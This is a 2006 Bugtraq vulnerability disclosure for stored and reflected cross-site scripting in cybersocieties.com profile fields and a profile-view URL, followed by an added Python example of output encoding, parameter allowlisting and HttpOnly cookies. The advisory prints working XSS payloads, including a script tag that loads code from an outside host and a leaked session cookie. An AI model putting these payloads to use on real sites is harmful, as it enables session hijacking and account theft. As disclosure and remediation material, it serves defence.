Cybersocieties.com - XSS & cookie disclosure
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Cybersocieties.com - XSS & cookie disclosure
- From: luny@xxxxxxxxxxxxxxx
- Date: 12 Jun 2006 22:30:39 -0000
Cybersocieties.com
Homepage:
http://www.cybersocieties.com
Affected files:
* Input boxes in profile:
- Full name box
- Occupation box
- MSN box
- Yahoo box
- AIM Box
* Viewing a profile
------------------------------------------------------
XSS vuln via input boxes in profile:
No filter evasion is needed. For PoC try putting the following codes in one of
the boxes mentioned above:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
or:
<IMG SRC=javascript:alert('XSS')>
or:
<IMG SRC="javascript:document.write(document.cookie)">
etc
Screenshots:
http://www.youfucktard.com/xsp/cyberso1.jpg
http://www.youfucktard.com/xsp/cyberso2.jpg
http://www.youfucktard.com/xsp/cyberso3.jpg
Our Cookie:
This is remote text via xss.js located at youfucktard.com
CFTOKEN=544ABB96-138B-14A6-ADAD1496630F53D7; CFID=436305; USERID=28506
--------------------------------------------------------
Viewing a profile XSS vuln PoC:
http://www.cybersocieties.com/index.cfm?fractal=bsw.dsp.home.main&UserID=28506&tab=3">">">">">'><SCRIPT></SCRIPT><BR><BR><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<""><"<'
Screenshot:
http://www.youfucktard.com/xsp/cyberso4.jpg
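
The fix side of the two findings above, as an added example that is not part of the original post or the site's own code: profile fields are HTML-encoded on output, the `tab` parameter is checked against an allowlist before it is reflected, and the session cookie is marked HttpOnly so page script cannot read it. The function names, the set of valid tab ids and the sample values are assumptions made for illustration.

```python
import html
from http.cookies import SimpleCookie

# Assumption: the real set of tab ids is not given in the advisory.
ALLOWED_TABS = {"1", "2", "3"}


def encode_field(value: str) -> str:
    """Encode a stored profile field for an HTML body or quoted attribute."""
    return html.escape(value, quote=True)


def safe_tab(raw: str, default: int = 1) -> int:
    """Accept the tab query parameter only if it is an allowlisted id."""
    return int(raw) if raw in ALLOWED_TABS else default


def session_cookie(name: str, value: str) -> str:
    """Build a Set-Cookie value that document.cookie cannot read."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["httponly"] = True
    jar[name]["path"] = "/"
    return jar[name].OutputString()


# Constructed sample input in the shapes the advisory describes
# (script host replaced with a placeholder).
PROFILE = {
    "Full name": "<SCRIPT SRC=http://placeholder.example/xss.js></SCRIPT>",
    "Occupation": "<IMG SRC=javascript:alert('XSS')>",
    "MSN": "plain@example.com",
}
TAB_PARAM = "3\">\">'><SCRIPT></SCRIPT>"

if __name__ == "__main__":
    for label, value in PROFILE.items():
        print(f"<dt>{html.escape(label)}</dt><dd>{encode_field(value)}</dd>")
    # The tampered tab value falls back to the default instead of being echoed.
    print(f'<div data-tab="{safe_tab(TAB_PARAM)}">')
    print("Set-Cookie:", session_cookie("CFID", "constructed-session-id"))
```

Encoding at output time covers every box in the list without needing a per-field input filter, and it leaves legitimate values such as the e-mail address unchanged.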